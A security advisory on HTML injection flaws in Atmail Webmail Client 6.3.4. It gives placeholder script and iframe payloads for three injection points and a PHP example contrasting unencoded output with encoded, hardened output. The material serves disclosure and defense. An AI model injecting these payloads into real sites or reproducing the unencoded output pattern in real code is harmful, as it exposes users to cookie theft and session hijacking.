Published: 2012-01-09
Updated: 2012-01-10
Affected systems:
@Mail Atmail Webmail Client 6.3.4
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51313
Atmail is a vendor of a commercial Linux messaging platform.
Atmail Webmail Client does not properly filter user-supplied input before using it as dynamic content, which leaves the implementation with multiple HTML injection vulnerabilities. Successful exploitation allows an attacker to execute arbitrary HTML and script code in the browser of a user of the affected site, steal cookie-based authentication credentials, or control how the site is rendered.
<*Source: Benjamin Kunz Mejri
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users assume all risk!
Benjamin Kunz Mejri () provided the following test method:
Code Review: Exception Handling of the Application Service
<div>
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><EXECUTION OF MALICIOUS SCRIPT CODE")' <="" where'="" at="" line="" 1="" <h2="">Application error</h2>
<h3>Exception information:</h3>
<p>
<b>Message:<br></b> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><iframe src=a onload=alert("PERSISTENT") < where' at line 1
</p>
<strong>Thrown in:</strong> /usr/local/atmail/webmail/library/Zend/Db/Statement/Pdo.php, Line #:234, Code #: 42000
<h3>Stack trace:</h3>
<pre>#0 /usr/local/atmail/webmail/library/Zend/Db/Statement.php(300):
Zend_Db_Statement_Pdo->_execute(Array)
#1 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(468): Zend_Db_Statement->execute(Array)
#2 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract->query('select count(id...', Array)
#3 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(799): Zend_Db_Adapter_Pdo_Abstract->query('select count(id...', Array)
#4 /usr/local/atmail/webmail/application/models/api.php(3270): Zend ... ...
Code Review: Adding New User - Userverwaltung or User Registration
<tr>
<td>
Firstname </td>
<td>
<input maxlength="128"
value="<script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>">
</td>
</tr>
<tr>
<td>
Lastname </td>
<td>
<input maxlength="128" value="Last Name">
</td>
</tr>
Code Review: Mass Mail - Output
<td>Filter by domain:</td>
<td>
<input value="" <script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>" type="text">
<small>Specify a domain or email to filter results</small>
</td>
<td>
</td>
</tr>
</tbody></table>
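All three reviews above show the same defect: a user-controlled string (the SQL error text, the Firstname field, the domain filter) is written into the page without encoding, so a quote character closes the attribute or element and the rest of the string becomes live markup. The following PHP is an added example, not Atmail's code, showing the vulnerable pattern next to its hardened form and an error page that logs the exception message instead of rendering it. The function names, the log path and the sample exception message are assumptions made for this illustration; htmlspecialchars, error_log and random_bytes are standard PHP.

```php
<?php
// Added example, not Atmail's code: output encoding and error-page handling for the
// three reflection points the advisory shows. Function names, the log path and the
// sample message are assumptions made for this illustration.
declare(strict_types=1);

/** Encode a string for use as HTML text or inside a double- or single-quoted attribute. */
function e(string $s): string
{
    // ENT_QUOTES encodes ' and " as well as < > &, so a value cannot close value="..."
    // early; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Pattern from the "Adding New User" review: the field is echoed into the attribute raw. */
function renderFirstnameRowVulnerable(string $firstname): string
{
    return '<td>Firstname </td><td><input maxlength="128" value="' . $firstname . '"></td>';
}

/** Hardened form of the same row: the value is attribute-encoded before output. */
function renderFirstnameRow(string $firstname): string
{
    return '<td>Firstname </td><td><input maxlength="128" value="' . e($firstname) . '"></td>';
}

/**
 * Exception page: the advisory's error screen prints the PDO message, which carries the
 * submitted string, straight into the HTML. Instead, log the full message under a
 * reference id and show the user only the id (encoded, like everything else).
 */
function renderApplicationError(Throwable $ex, string $logFile): string
{
    $ref = bin2hex(random_bytes(8));
    $line = sprintf("[%s] %s: %s in %s:%d\n", $ref, get_class($ex), $ex->getMessage(),
        $ex->getFile(), $ex->getLine());
    error_log($line, 3, $logFile);   // message_type 3 appends to the given file
    return '<h2>Application error</h2><p>Something went wrong. Reference: ' . e($ref) . '</p>';
}

// Constructed input using the advisory's placeholder payload.
$payload = '"><script>EXECUTION OF MALICIOUS SCRIPT CODE)</script>';

echo renderFirstnameRowVulnerable($payload), "\n";   // the quote closes value="" early
echo renderFirstnameRow($payload), "\n";             // the payload stays inert inside value="..."

try {
    // Constructed stand-in for the SQLSTATE[42000] message shown in the advisory.
    throw new RuntimeException("SQLSTATE[42000]: Syntax error ... near '" . $payload . "'");
} catch (Throwable $ex) {
    echo renderApplicationError($ex, sys_get_temp_dir() . '/atmail-example.log'), "\n";
}
```

Run it with `php example.php` and compare the two input rows: in the first the `<script>` element is real markup, in the second every quote and angle bracket is an entity. Encoding belongs at the point of output, not on input, because the same submitted value reaches the error page, the registration form and the mass-mail filter through different paths. Separately, the fact that a MySQL syntax error is reported at all means the submitted string reaches the query layer unchanged; the advisory only demonstrates the HTML injection, but that error path deserves its own review.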
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
@Mail
-----
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version: